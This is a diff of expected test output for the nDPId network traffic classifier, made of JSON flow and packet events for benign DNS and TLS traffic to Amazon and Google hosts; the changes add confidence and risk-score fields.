 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2794,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":149,"flow_packet_id":1,"flow_last_seen":1490976195529,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1490976195529,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8suhAAEAGqwasECrYNFXRj6NkAbuAhDhYAAAAAKAC\/\/+BjwAAAgQFtAQCCAoA9oqwAAAAAAEDAwg="}
 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2795,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976195545,"flow_last_seen":1490976195545,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1490976195545,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":40425,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2795,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":150,"flow_packet_id":1,"flow_last_seen":1490976195545,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1490976195545,"pkt":"AMDKkaPvePiC0\/vCCABFAABIWmVAAEARM0asECrYrBAqAZ3pADUANBzi5IoBAAABAAAAAAAAB2FuZHJvaWQHY2xpZW50cwZnb29nbGUDY29tAAABAAE="}
-00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2795,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976195545,"flow_last_seen":1490976195545,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1490976195545,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":40425,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"dns": {"query":"android.clients.google.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2795,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976195545,"flow_last_seen":1490976195545,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1490976195545,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":40425,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"dns": {"query":"android.clients.google.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2798,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":149,"flow_packet_id":2,"flow_last_seen":1490976195572,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1490976195572,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPMGqu40VdGPrBAq2AG7o2R8wwHRgIQ4WaAScSCn6AAAAgQFtAQCCApttHwsAPaKsAEDAwg="}
 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2799,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":149,"flow_packet_id":3,"flow_last_seen":1490976195573,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1490976195573,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0sulAAEAGqw2sECrYNFXRj6NkAbuAhDhZfMMB0oAQAVdGegAAAQEICgD2irVttHws"}
-00821{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2800,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976195529,"flow_last_seen":1490976195574,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":202,"flow_tot_l4_payload_len":202,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1490976195574,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.143","src_port":41828,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
-00878{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2802,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976195529,"flow_last_seen":1490976195621,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1650,"flow_avg_l4_payload_len":275,"midstream":0,"ts_msec":1490976195621,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.143","src_port":41828,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}}
-01356{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2804,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976195529,"flow_last_seen":1490976195622,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4546,"flow_avg_l4_payload_len":568,"midstream":0,"ts_msec":1490976195622,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.143","src_port":41828,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","server_names":"amazon.com,amzn.com,uedata.amazon.com,us.amazon.com,www.amazon.com,www.amzn.com,corporate.amazon.com,buybox.amazon.com,iphone.amazon.com,yp.amazon.com,home.amazon.com,origin-www.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=www.amazon.com","alpn":"h2,http\/1.1","fingerprint":"EF:14:6C:F1:5C:4A:F8:4D:BA:83:C2:1E:6C:5B:ED:C4:FA:34:1C:3E"}}
+00847{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2800,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976195529,"flow_last_seen":1490976195574,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":202,"flow_tot_l4_payload_len":202,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1490976195574,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.143","src_port":41828,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
+00904{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2802,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976195529,"flow_last_seen":1490976195621,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1650,"flow_avg_l4_payload_len":275,"midstream":0,"ts_msec":1490976195621,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.143","src_port":41828,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}}
+01382{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2804,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976195529,"flow_last_seen":1490976195622,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4546,"flow_avg_l4_payload_len":568,"midstream":0,"ts_msec":1490976195622,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.143","src_port":41828,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","server_names":"amazon.com,amzn.com,uedata.amazon.com,us.amazon.com,www.amazon.com,www.amzn.com,corporate.amazon.com,buybox.amazon.com,iphone.amazon.com,yp.amazon.com,home.amazon.com,origin-www.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=www.amazon.com","alpn":"h2,http\/1.1","fingerprint":"EF:14:6C:F1:5C:4A:F8:4D:BA:83:C2:1E:6C:5B:ED:C4:FA:34:1C:3E"}}
 00549{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2810,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":150,"flow_packet_id":2,"flow_last_seen":1490976195628,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":92,"ts_msec":1490976195628,"pkt":"ePiC0\/vCAMDKkaPvCABFAABw6\/5AAEARoYSsECoBrBAq2AA1nekAXGuw5IqBgAABAAIAAAAAB2FuZHJvaWQHY2xpZW50cwZnb29nbGUDY29tAAABAAHADAAFAAEAAAErAAwHYW5kcm9pZAFswBzAOAABAAEAAAErAATYOsJO"}
-00778{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2810,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976195545,"flow_last_seen":1490976195628,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":84,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":64,"midstream":0,"ts_msec":1490976195628,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":40425,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"dns": {"query":"android.clients.google.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"216.58.194.78"}}
+00804{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2810,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976195545,"flow_last_seen":1490976195628,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":84,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":64,"midstream":0,"ts_msec":1490976195628,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":40425,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"dns": {"query":"android.clients.google.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"216.58.194.78"}}
 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2811,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976195633,"flow_last_seen":1490976195633,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1490976195633,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"216.58.194.78","src_port":49067,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2811,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":151,"flow_packet_id":1,"flow_last_seen":1490976195633,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1490976195633,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8fD5AAEAGTQysECrY2DrCTr+rAbtBfvaFAAAAAKAC\/\/9RcQAAAgQFtAQCCAoA9oq7AAAAAAEDAwg="}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2815,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":151,"flow_packet_id":2,"flow_last_seen":1490976195670,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1490976195670,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8ibgAADcGiJLYOsJOrBAq2AG7v6uBvvSDQX72hqASpajvAAAAAgQFZAQCCAoLBTvAAPaKuwEDAwc="}
 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2816,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":151,"flow_packet_id":3,"flow_last_seen":1490976195672,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1490976195672,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0fD9AAEAGTROsECrY2DrCTr+rAbtBfvaGgb70hIAQAVfBygAAAQEICgD2ir8LBTvA"}
-00875{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2820,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976195633,"flow_last_seen":1490976195724,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":185,"flow_avg_l4_payload_len":46,"midstream":0,"ts_msec":1490976195724,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"216.58.194.78","src_port":49067,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"tls": {"version":"TLSv1.2","client_requested_server_name":"android.clients.google.com","ja3":"5bf38a5cbf896cd31eeef4d6ad1503e1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
-00940{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2824,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976195633,"flow_last_seen":1490976195762,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1603,"flow_avg_l4_payload_len":267,"midstream":0,"ts_msec":1490976195762,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"216.58.194.78","src_port":49067,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"tls": {"version":"TLSv1.2","client_requested_server_name":"android.clients.google.com","ja3":"5bf38a5cbf896cd31eeef4d6ad1503e1","ja3s":"9b1466fd60cadccb848e09c86e284265","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256"}}
-02004{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2826,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976195633,"flow_last_seen":1490976195763,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":4172,"flow_avg_l4_payload_len":521,"midstream":0,"ts_msec":1490976195763,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"216.58.194.78","src_port":49067,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"tls": {"version":"TLSv1.2","client_requested_server_name":"android.clients.google.com","server_names":"*.google.com,*.android.com,*.appengine.google.com,*.cloud.google.com,*.gcp.gvt2.com,*.google-analytics.com,*.google.ca,*.google.cl,*.google.co.in,*.google.co.jp,*.google.co.uk,*.google.com.ar,*.google.com.au,*.google.com.br,*.google.com.co,*.google.com.mx,*.google.com.tr,*.google.com.vn,*.google.de,*.google.es,*.google.fr,*.google.hu,*.google.it,*.google.nl,*.google.pl,*.google.pt,*.googleadapis.com,*.googleapis.cn,*.googlecommerce.com,*.googlevideo.com,*.gstatic.cn,*.gstatic.com,*.gvt1.com,*.gvt2.com,*.metric.gstatic.com,*.urchin.com,*.url.google.com,*.youtube-nocookie.com,*.youtube.com,*.youtubeeducation.com,*.ytimg.com,android.clients.google.com,android.com,developer.android.google.cn,g.co,goo.gl,google-analytics.com,google.com,googlecommerce.com,urchin.com,www.goo.gl,youtu.be,youtube.com,youtubeeducation.com","ja3":"5bf38a5cbf896cd31eeef4d6ad1503e1","ja3s":"9b1466fd60cadccb848e09c86e284265","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.google.com","fingerprint":"54:A0:1E:03:FF:CB:33:BC:9D:65:DC:D7:BF:6B:04:2B:F9:F3:D5:42"}}
+00981{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2820,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976195633,"flow_last_seen":1490976195724,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":185,"flow_avg_l4_payload_len":46,"midstream":0,"ts_msec":1490976195724,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"216.58.194.78","src_port":49067,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"tls": {"version":"TLSv1.2","client_requested_server_name":"android.clients.google.com","ja3":"5bf38a5cbf896cd31eeef4d6ad1503e1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+01046{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2824,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976195633,"flow_last_seen":1490976195762,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1603,"flow_avg_l4_payload_len":267,"midstream":0,"ts_msec":1490976195762,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"216.58.194.78","src_port":49067,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"tls": {"version":"TLSv1.2","client_requested_server_name":"android.clients.google.com","ja3":"5bf38a5cbf896cd31eeef4d6ad1503e1","ja3s":"9b1466fd60cadccb848e09c86e284265","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256"}}
+02110{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2826,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976195633,"flow_last_seen":1490976195763,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":4172,"flow_avg_l4_payload_len":521,"midstream":0,"ts_msec":1490976195763,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"216.58.194.78","src_port":49067,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"tls": {"version":"TLSv1.2","client_requested_server_name":"android.clients.google.com","server_names":"*.google.com,*.android.com,*.appengine.google.com,*.cloud.google.com,*.gcp.gvt2.com,*.google-analytics.com,*.google.ca,*.google.cl,*.google.co.in,*.google.co.jp,*.google.co.uk,*.google.com.ar,*.google.com.au,*.google.com.br,*.google.com.co,*.google.com.mx,*.google.com.tr,*.google.com.vn,*.google.de,*.google.es,*.google.fr,*.google.hu,*.google.it,*.google.nl,*.google.pl,*.google.pt,*.googleadapis.com,*.googleapis.cn,*.googlecommerce.com,*.googlevideo.com,*.gstatic.cn,*.gstatic.com,*.gvt1.com,*.gvt2.com,*.metric.gstatic.com,*.urchin.com,*.url.google.com,*.youtube-nocookie.com,*.youtube.com,*.youtubeeducation.com,*.ytimg.com,android.clients.google.com,android.com,developer.android.google.cn,g.co,goo.gl,google-analytics.com,google.com,googlecommerce.com,urchin.com,www.goo.gl,youtu.be,youtube.com,youtubeeducation.com","ja3":"5bf38a5cbf896cd31eeef4d6ad1503e1","ja3s":"9b1466fd60cadccb848e09c86e284265","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.google.com","fingerprint":"54:A0:1E:03:FF:CB:33:BC:9D:65:DC:D7:BF:6B:04:2B:F9:F3:D5:42"}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2861,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":152,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976195921,"flow_last_seen":1490976195921,"flow_idle_time":180000,"flow_min_l4_payload_len":49,"flow_max_l4_payload_len":49,"flow_tot_l4_payload_len":49,"flow_avg_l4_payload_len":49,"midstream":0,"ts_msec":1490976195921,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":4612,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2861,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":152,"flow_packet_id":1,"flow_last_seen":1490976195921,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":91,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":91,"pkt_l4_len":57,"ts_msec":1490976195921,"pkt":"AMDKkaPvePiC0\/vCCABFAABNWmZAAEARM0CsECrYrBAqARIEADUAOVP\/iiYBAAABAAAAAAAACWltYWdlcy1uYRFzc2wtaW1hZ2VzLWFtYXpvbgNjb20AAAEAAQ=="}
-00759{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2861,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":152,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976195921,"flow_last_seen":1490976195921,"flow_idle_time":180000,"flow_min_l4_payload_len":49,"flow_max_l4_payload_len":49,"flow_tot_l4_payload_len":49,"flow_avg_l4_payload_len":49,"midstream":0,"ts_msec":1490976195921,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":4612,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"images-na.ssl-images-amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00785{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2861,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":152,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976195921,"flow_last_seen":1490976195921,"flow_idle_time":180000,"flow_min_l4_payload_len":49,"flow_max_l4_payload_len":49,"flow_tot_l4_payload_len":49,"flow_avg_l4_payload_len":49,"midstream":0,"ts_msec":1490976195921,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":4612,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"images-na.ssl-images-amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00645{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2864,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":152,"flow_packet_id":2,"flow_last_seen":1490976195980,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":197,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":197,"pkt_l4_len":163,"ts_msec":1490976195980,"pkt":"ePiC0\/vCAMDKkaPvCABFAAC37AVAAEARoTasECoBrBAq2AA1EgQAo8CaiiaBgAABAAUAAAAACWltYWdlcy1uYRFzc2wtaW1hZ2VzLWFtYXpvbgNjb20AAAEAAcAMAAUAAQAAAAMAHg1kazlwczdnb3FvZWVmCmNsb3VkZnJvbnQDbmV0AMA9AAEAAQAAADsABDRUPnPAPQABAAEAAAA7AAQ0VD7rwD0AAQABAAAAOwAENFQ+v8A9AAEAAQAAADsABDRUPj4="}
